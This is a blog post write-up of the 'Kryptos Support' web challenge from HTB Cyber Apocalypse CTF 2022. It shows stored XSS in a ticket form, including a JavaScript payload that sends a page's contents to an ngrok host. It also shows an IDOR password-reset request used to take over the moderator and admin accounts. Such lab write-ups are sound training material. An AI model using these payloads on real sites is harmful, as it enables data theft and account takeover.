<!DOCTYPE html>
<html lang="en">
<head>

  <meta charset="utf-8" />

  
  <title>Kryptos Support challenge Writeup</title>

  
  
  <link href="//cdn.jsdelivr.net" rel="dns-prefetch">
  <link href="//cdnjs.cloudflare.com" rel="dns-prefetch">
  
  <link href="//at.alicdn.com" rel="dns-prefetch">
  
  <link href="//fonts.googleapis.com" rel="dns-prefetch">
  <link href="//fonts.gstatic.com" rel="dns-prefetch">
  
  
  
  
  

  

  
  <meta name="author" content="0xMesbaha">
  <meta name="description" content="HTB Cyber Apocalypse CTF 2022 was held from the 14th of May Until the 19th of the month , and we have participated under the team 0xcha0s, we have managed to solve multiple challenges. this challenge was ranked easy
">

  
  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:site" content="@gohugoio">
    <meta name="twitter:title" content="Kryptos Support challenge Writeup">
    <meta name="twitter:description" content="HTB Cyber Apocalypse CTF 2022 was held from the 14th of May Until the 19th of the month , and we have participated under the team 0xcha0s, we have managed to solve multiple challenges. this challenge was ranked easy
">
    <meta name="twitter:image" content="/media/CTFs/Flag.png">
  

  
  <meta property="og:type" content="article">
  <meta property="og:title" content="Kryptos Support challenge Writeup">
  <meta property="og:description" content="HTB Cyber Apocalypse CTF 2022 was held from the 14th of May Until the 19th of the month , and we have participated under the team 0xcha0s, we have managed to solve multiple challenges. this challenge was ranked easy
">
  <meta property="og:url" content="/post/kryptos-support/">
  <meta property="og:image" content="/media/CTFs/Flag.png">




<meta name="generator" content="Hugo 0.86.1">


<link rel="canonical" href="/post/kryptos-support/">

<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="format-detection" content="telephone=no,email=no,adress=no">
<meta http-equiv="Cache-Control" content="no-transform">


<meta name="robots" content="index,follow">
<meta name="referrer" content="origin-when-cross-origin">







<meta name="theme-color" content="#02b875">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="0xMesbaha">
<meta name="msapplication-tooltip" content="0xMesbaha">
<meta name='msapplication-navbutton-color' content="#02b875">
<meta name="msapplication-TileColor" content="#02b875">
<meta name="msapplication-TileImage" content="/icons/icon-144x144.png">
<link rel="icon" href="/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="/icons/icon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="/icons/icon-32x32.png">
<link rel="icon" sizes="192x192" href="/icons/icon-192x192.png">
<link rel="apple-touch-icon" href="/icons/icon-152x152.png">
<link rel="manifest" href="/manifest.json">


<link rel="preload" href="/styles/main-rendered.min.css" as="style">


<link rel="preload" href="https://fonts.googleapis.com/css?family=Lobster" as="style">
<link rel="preload" href="/images/avatar.gif" as="image">
<link rel="preload" href="/images/test.jpg" as="image">


<style>
  body {
    background: rgb(244, 243, 241) url('/images/test.jpg') repeat fixed;
  }
</style>
<link rel="stylesheet" href="/styles/main-rendered.min.css">


<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster">



<script src="https://cdn.jsdelivr.net/npm/medium-zoom@1.0.2/dist/medium-zoom.min.js"></script>




<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/video.js@7.3.0/dist/video-js.min.css">



  
  
<!--[if lte IE 8]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/videojs-ie8@1.1.2/dist/videojs-ie8.min.js"></script>
<![endif]-->

<!--[if lte IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/eligrey-classlist-js-polyfill@1.2.20180112/classList.min.js"></script>
<![endif]-->


</head>
  <body>
    <div class="suspension">
      <a role="button" aria-label="Go to top" title="Go to top" class="to-top is-hide"><span class="icon icon-up" aria-hidden="true"></span></a>
      
        
      
    </div>
    
    
  <header class="site-header">
  <a href=""><img class="avatar" src="/images/avatar.gif" alt="Avatar"></a>
  
  <h2 class="title"><a href="">0xMesbaha</a></h2>
  
  <p class="subtitle"></p>
  <button class="menu-toggle" type="button" aria-label="Main Menu" aria-expanded="false" tab-index="0">
    <span class="icon icon-menu" aria-hidden="true"></span>
  </button>

  <nav class="site-menu collapsed">
    <h2 class="offscreen">Main Menu</h2>
    <ul class="menu-list">
      
      
      
      
        <li class="menu-item
          
          
          ">
          <a href="/">Posts</a>
        </li>
      
        <li class="menu-item
          
          
          ">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="menu-item
          
          
          ">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </nav>
  <nav class="social-menu collapsed">
    <h2 class="offscreen">Social Networks</h2>
    <ul class="social-list"><li class="social-item">
          <a href="//github.com/hussienMisbah" rel="me" title="GitHub" aria-label="GitHub">
	    <span class="icon icon-github" aria-hidden="true"></span>
          </a>
        </li><li class="social-item">
          <a href="//medium.com/@mesbaha" rel="me" title="Medium" aria-label="Medium">
            <span class="icon icon-medium" aria-hidden="true"></span>
          </a>
        </li><li class="social-item">
          <a href="//www.linkedin.com/in/hussien-6331151b2" rel="me" title="LinkedIn" aria-label="LinkedIn">
            <span class="icon icon-linkedin" aria-hidden="true"></span>
          </a>
        </li></ul>
  </nav>
</header>

  <section class="main post-detail">
    <header class="post-header">
      <h1 class="post-title">Kryptos Support challenge Writeup</h1>
      <p class="post-meta">@0xMesbaha · May 19, 2022 · 3 min read</p>
    </header>
    <article class="post-content"><p>HTB Cyber Apocalypse CTF 2022 was held from the 14th of May Until the 19th of the month , and we have participated under the team 0xcha0s, we have managed to solve multiple challenges. this challenge was ranked easy</p>
<table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>CTF name</td>
<td><a href="https://www.hackthebox.com/events/cyber-apocalypse-2022">Cyber Apocalypse CTF 2022</a></td>
</tr>
<tr>
<td>challenge</td>
<td>Kryptos Support</td>
</tr>
<tr>
<td>category</td>
<td>web</td>
</tr>
<tr>
<td>about</td>
<td>XSS , IDOR</td>
</tr>
<tr>
<td>team</td>
<td><a href="https://ctftime.org/team/168238">0xCha0s</a></td>
</tr>
</tbody>
</table>
<h2 id="discovery-">Discovery :</h2>
<p>This easy challenge are introduced with this page  , as we see just add a report issue interface:</p>
<p><img src="/media/CTFs/Kryptos-Support/20220517090100.png" alt="image"></p>
<p>There is also end point <code>/login</code>  But there is no <code>/signup</code> or <code>register</code></p>
<p><img src="/media/CTFs/Kryptos-Support/20220517090146.png" alt="image"></p>
<p>and First thing i have tried is to get xss , i used xsshunter as a proof only latter on will use ngrok http server :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#f92672">script</span> <span style="color:#a6e22e">src</span><span style="color:#f92672">=</span><span style="color:#e6db74">https://XXXXXXX.xss.ht</span>&gt;&lt;/<span style="color:#f92672">script</span>&gt;
</code></pre></div><p>and we get a hit :</p>
<p><img src="/media/CTFs/Kryptos-Support/20220517090357.png" alt="image"></p>
<p>we know from the report the following :</p>
<ul>
<li>vulnerable page <code>http://127.0.0.1:1337/tickets/new</code></li>
<li>the session used is JWT based: <code>session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI3NzEwMTh9.iQshqI16zGjE3tUOVQHsqLKaZofC8JyFN4CWhHH6lWg</code></li>
<li>and from the DOM we can see there are other internal end points which are <code>/settings</code> and <code>/logout</code></li>
</ul>
<p>Decoding the cookie we got the username and the uid</p>
<p><img src="/media/CTFs/Kryptos-Support/20220517090628.png" alt="image"></p>
<h2 id="attacking-">Attacking :</h2>
<p>I wanted to get an overview about what functions are there in the <code>/settings</code> page. so we craft this payload :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#66d9ef">var</span> <span style="color:#a6e22e">xhr</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">XMLHttpRequest</span>();
<span style="color:#a6e22e">xhr</span>.<span style="color:#a6e22e">open</span>(<span style="color:#e6db74">&#34;GET&#34;</span>,<span style="color:#e6db74">&#34;http://127.0.0.1:1337/settings&#34;</span>);
<span style="color:#a6e22e">xhr</span>.<span style="color:#a6e22e">onload</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">function</span>(){
    <span style="color:#66d9ef">var</span> <span style="color:#a6e22e">out</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">btoa</span>(<span style="color:#a6e22e">xhr</span>.<span style="color:#a6e22e">responseText</span>);
    <span style="color:#66d9ef">var</span> <span style="color:#a6e22e">exfil</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">XMLHttpRequest</span>();
    <span style="color:#a6e22e">exfil</span>.<span style="color:#a6e22e">open</span>(<span style="color:#e6db74">&#34;GET&#34;</span>,<span style="color:#e6db74">&#34;http://3bbd-156-194-235-84.ngrok.io/?out=&#34;</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">out</span>);
    <span style="color:#a6e22e">exfil</span>.<span style="color:#a6e22e">send</span>();
};
<span style="color:#a6e22e">xhr</span>.<span style="color:#a6e22e">send</span>();
</code></pre></div><p>and will use this payload at the report page to request the script we host :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#f92672">script</span> <span style="color:#a6e22e">src</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://3bbd-156-194-235-84.ngrok.io/get.js&#34;</span>&gt;&lt;/<span style="color:#f92672">script</span>&gt;
</code></pre></div><p><img src="/media/CTFs/Kryptos-Support/20220517091750.png" alt="image"></p>
<p>decoding it :</p>
<p><img src="/media/CTFs/Kryptos-Support/20220517091900.png" alt="image"></p>
<p>will notice the page has the update password function also , we can check the Js code under <code>/static/js/settings.js</code> and it is publicly exposed :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-Javascript" data-lang="Javascript"><span style="color:#a6e22e">$</span>(document).<span style="color:#a6e22e">ready</span>(<span style="color:#66d9ef">function</span>() {
	<span style="color:#a6e22e">$</span>(<span style="color:#e6db74">&#34;#update-btn&#34;</span>).<span style="color:#a6e22e">on</span>(<span style="color:#e6db74">&#39;click&#39;</span>, <span style="color:#a6e22e">updatePassword</span>);

});

<span style="color:#66d9ef">async</span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">updatePassword</span>() {

	<span style="color:#a6e22e">$</span>(<span style="color:#e6db74">&#39;#update-btn&#39;</span>).<span style="color:#a6e22e">prop</span>(<span style="color:#e6db74">&#39;disabled&#39;</span>, <span style="color:#66d9ef">true</span>);

	<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">card</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">$</span>(<span style="color:#e6db74">&#34;#resp-msg&#34;</span>);
    <span style="color:#a6e22e">card</span>.<span style="color:#a6e22e">text</span>(<span style="color:#e6db74">&#39;Updating password, please wait&#39;</span>);
	<span style="color:#a6e22e">card</span>.<span style="color:#a6e22e">show</span>();

	<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">uid</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">$</span>(<span style="color:#e6db74">&#34;#uid&#34;</span>).<span style="color:#a6e22e">val</span>();
	<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">password1</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">$</span>(<span style="color:#e6db74">&#34;#password1&#34;</span>).<span style="color:#a6e22e">val</span>();
	<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">password2</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">$</span>(<span style="color:#e6db74">&#34;#password2&#34;</span>).<span style="color:#a6e22e">val</span>();

	<span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">$</span>.<span style="color:#a6e22e">trim</span>(<span style="color:#a6e22e">password1</span>) <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;&#39;</span> <span style="color:#f92672">||</span> <span style="color:#a6e22e">password1</span> <span style="color:#f92672">!==</span> <span style="color:#a6e22e">password2</span>) {
		<span style="color:#a6e22e">$</span>(<span style="color:#e6db74">&#39;#update-btn&#39;</span>).<span style="color:#a6e22e">prop</span>(<span style="color:#e6db74">&#39;disabled&#39;</span>, <span style="color:#66d9ef">false</span>);
		<span style="color:#a6e22e">card</span>.<span style="color:#a6e22e">text</span>(<span style="color:#e6db74">&#34;Please type-in the same password!&#34;</span>);
		<span style="color:#a6e22e">card</span>.<span style="color:#a6e22e">show</span>();
		<span style="color:#66d9ef">return</span>;
	}

	<span style="color:#66d9ef">await</span> <span style="color:#a6e22e">fetch</span>(<span style="color:#e6db74">`/api/users/update`</span>, {
			<span style="color:#a6e22e">method</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;POST&#39;</span>,
			<span style="color:#a6e22e">headers</span><span style="color:#f92672">:</span> {
				<span style="color:#e6db74">&#39;Content-Type&#39;</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;application/json&#39;</span>,
			},
			<span style="color:#a6e22e">body</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">JSON</span>.<span style="color:#a6e22e">stringify</span>({<span style="color:#a6e22e">password</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">password1</span>, <span style="color:#a6e22e">uid</span>}),
		})
		.<span style="color:#a6e22e">then</span>((<span style="color:#a6e22e">response</span>) =&gt; <span style="color:#a6e22e">response</span>.<span style="color:#a6e22e">json</span>()
			.<span style="color:#a6e22e">then</span>((<span style="color:#a6e22e">resp</span>) =&gt; {
				<span style="color:#a6e22e">card</span>.<span style="color:#a6e22e">text</span>(<span style="color:#a6e22e">resp</span>.<span style="color:#a6e22e">message</span>);
				<span style="color:#a6e22e">card</span>.<span style="color:#a6e22e">show</span>();
			}))
		.<span style="color:#66d9ef">catch</span>((<span style="color:#a6e22e">error</span>) =&gt; {
			<span style="color:#a6e22e">card</span>.<span style="color:#a6e22e">text</span>(<span style="color:#a6e22e">error</span>);
			<span style="color:#a6e22e">card</span>.<span style="color:#a6e22e">show</span>();
		});

    <span style="color:#a6e22e">$</span>(<span style="color:#e6db74">&#39;#update-btn&#39;</span>).<span style="color:#a6e22e">prop</span>(<span style="color:#e6db74">&#39;disabled&#39;</span>, <span style="color:#66d9ef">false</span>);
}
</code></pre></div><p>The catch here is that it doesn&rsquo;t check the old password , just providing the uid and the new password  will reset the password. we can confirm with this script which will reset the password of the moderator user</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#66d9ef">var</span> <span style="color:#a6e22e">xhr</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">XMLHttpRequest</span>();
<span style="color:#66d9ef">var</span> <span style="color:#a6e22e">theUrl</span> <span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://127.0.0.1:1337/api/users/update&#34;</span>;
<span style="color:#a6e22e">xhr</span>.<span style="color:#a6e22e">open</span>(<span style="color:#e6db74">&#34;POST&#34;</span>, <span style="color:#a6e22e">theUrl</span>);
<span style="color:#a6e22e">xhr</span>.<span style="color:#a6e22e">setRequestHeader</span>(<span style="color:#e6db74">&#34;Content-Type&#34;</span>, <span style="color:#e6db74">&#34;application/json;charset=UTF-8&#34;</span>);
<span style="color:#a6e22e">xhr</span>.<span style="color:#a6e22e">send</span>(<span style="color:#a6e22e">JSON</span>.<span style="color:#a6e22e">stringify</span>({ <span style="color:#e6db74">&#34;password&#34;</span><span style="color:#f92672">:</span><span style="color:#e6db74">&#34;testme123&#34;</span>,<span style="color:#e6db74">&#39;uid&#39;</span><span style="color:#f92672">:</span><span style="color:#e6db74">&#39;100&#39;</span>}));
</code></pre></div><p>And we have successfully logged in with the new password and the username <code>moderator</code> :</p>
<p><img src="/media/CTFs/Kryptos-Support/20220517092343.png" alt="image"></p>
<p>Now why not reset the password for the user <strong><code>admin</code></strong> too ? , as it doesn&rsquo;t check on the <code>uid</code> , we can run intruder to fuzz the admin uid But for our luck it is <strong><code>1</code></strong> . from the moderator account we can reset the password without the need to use javascript code and ngrok hosting it</p>
<p><img src="/media/CTFs/Kryptos-Support/20220517093121.png" alt="image"></p>
<p>and now we can login with the admin user</p>
<p><img src="/media/CTFs/Kryptos-Support/20220517093228.png" alt="image"></p></article>
    <footer class="post-footer">
      
      <ul class="post-tags">
        
          <li><a href="/tags/ctf"><span class="tag">CTF</span></a></li>
        
          <li><a href="/tags/xss"><span class="tag">XSS</span></a></li>
        
          <li><a href="/tags/idor"><span class="tag">IDOR</span></a></li>
        
      </ul>
      
      <p class="post-copyright">
        © all rights reserved for 0xMesbaha.
      </p>
    </footer>
    
      
    
  </section>
  
<footer class="site-footer">
  <p>© 2017-2022 0xMesbaha</p>
  <p>Powered by <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> with theme <a href="https://github.com/laozhu/hugo-nuo" target="_blank" rel="noopener">Nuo</a>.</p>
  
</footer>


<script src="https://cdn.jsdelivr.net/npm/smooth-scroll@15.0.0/dist/smooth-scroll.min.js"></script>



<script async src="https://cdn.jsdelivr.net/npm/video.js@7.3.0/dist/video.min.js"></script>




<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [['$','$'], ['\\(','\\)']],
      displayMath: [['$$','$$'], ['\\[','\\]']],
      processEscapes: true,
      processEnvironments: true,
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
      TeX: { equationNumbers: { autoNumber: "AMS" },
      extensions: ["AMSmath.js", "AMSsymbols.js"] }
    },
  });
</script>
<script type="text/x-mathjax-config">
  // Fix <code> tags after MathJax finishes running. This is a
  // hack to overcome a shortcoming of Markdown. Discussion at
  // https://github.com/mojombo/jekyll/issues/199
  MathJax.Hub.Queue(() => {
    MathJax.Hub.getAllJax().map(v => v.SourceElement().parentNode.className += ' has-jax');
  });
</script>



<script src="/scripts/index.min.js"></script>

<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.register('\/service-worker.js').then(function() {
      console.log('[ServiceWorker] Registered');
    });
  }
</script>








  </body>
</html>
